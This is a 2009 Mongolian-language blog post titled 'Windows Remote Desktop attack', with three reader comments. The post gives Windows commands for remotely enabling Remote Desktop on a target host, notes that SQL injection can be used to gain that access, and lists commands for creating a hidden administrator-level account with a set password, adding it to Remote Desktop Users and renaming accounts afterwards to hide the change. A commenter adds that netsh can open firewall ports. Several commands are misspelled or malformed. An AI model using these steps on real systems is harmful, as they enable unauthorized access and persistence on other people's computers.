Monday, June 22, 2009

Windows Remote Desktop attack

Windows Remote Desktop -ийг тохиргооний дос команд

Windows Remote Desktop -ийг шалгах:
@reg query "\\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

Windows Remote Desktop -ийг идвэхтэй болгох
@reg add "\\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Windows Remote Desktop -ийг идвэхгүй болгох
@reg add \\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 1 /f

энэ хандалтийг хийхэд sql injection ийг ашгилаж болно.
мөн дос хандалтаар идвэх жүүлж болно.

windows-т хэрэглэгч нэмэх:

net user guest {s2J234OPH}
renuser guest notguest
net localgroup guests notguest /delete
renuser Administrator admin
net user /add Administrator /active:no /passwordchg:no /passwordreq:yes
netuser Administrator /pwnexp:y
net user Administrator {s2J234OPH}
net localgroup users Administrator /delete

ингэснээр Админ эрхтэй хэрэглэгч нэмж болох ба


net localgroup "Remote Desktop Users" Administrator /add

за та ингээд админ эрхээр Remote PC-руу хандаж чадхаар боллоо шүүдээ.

аан нээрэй тийн хандалт хийж дууссаны дараа дээр байгаа Administrator -ийг устгаад admin -ийг administrator болгохоо мартваа.
Good luck


3 comments:

Д.Цолбаяр said...

chinii ene status chin taalagdaj bnaa. Хүний хийж чадахгүй зүйл байдаггүй. гагцхүү түүнийг хийх гэж зүтгэж чаддаг хүн ховор gdg chin

Anonymous said...

firewall, kis ntertei bol yaahuu?

KingMonkey said...

Firewall uu hehe eniig bas hiij bolno shuude "netsh" gej windowst command baidag yum enendeer ni port esvel application iigni tavichihdag yumooo